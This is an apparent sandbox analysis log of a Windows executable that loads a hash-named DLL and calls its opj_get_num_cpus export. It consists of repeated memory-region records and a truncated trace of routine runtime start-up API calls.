"pagefile_0x00000000001b0000" filename = "" Region: id = 16845 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16846 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16847 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16848 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16849 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16850 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16851 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16852 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16853 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16854 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16855 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16856 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16857 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16858 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16859 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16860 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16861 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16862 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16863 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16864 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16865 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16866 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16867 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16868 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16869 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16870 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16871 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16872 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16873 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16874 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16875 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16876 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16877 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16878 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16879 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16880 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16881 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16882 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16883 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16884 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16885 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16886 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16887 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16888 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16889 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16890 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16891 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16892 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16893 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16894 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16895 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16896 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16897 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16898 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16899 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16900 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16901 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16902 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16903 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16904 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16905 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16906 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16907 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16908 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16909 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16910 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16911 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16912 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16913 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16914 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16915 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 224 os_tid = 0x1160 [0258.544] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.544] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0258.545] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.547] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0258.548] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0258.548] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.548] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0258.549] GetProcessHeap () returned 0x470000 [0258.549] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.549] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0258.549] GetLastError () returned 0x7e [0258.549] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0258.549] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0258.549] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c8) returned 0x47c320 [0258.550] SetLastError (dwErrCode=0x7e) [0258.550] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1200) returned 0x483470 [0258.552] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0258.552] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0258.552] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0258.552] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0258.552] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus" [0258.552] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus" [0258.552] GetACP () returned 0x4e4 [0258.552] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x228) returned 0x475380 [0258.552] IsValidCodePage (CodePage=0x4e4) returned 1 [0258.552] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0258.552] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0258.552] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0258.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0258.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0258.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0258.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0258.553] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.553] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0258.553] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0258.553] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0258.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0258.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0258.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0258.553] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0258.553] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0258.553] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 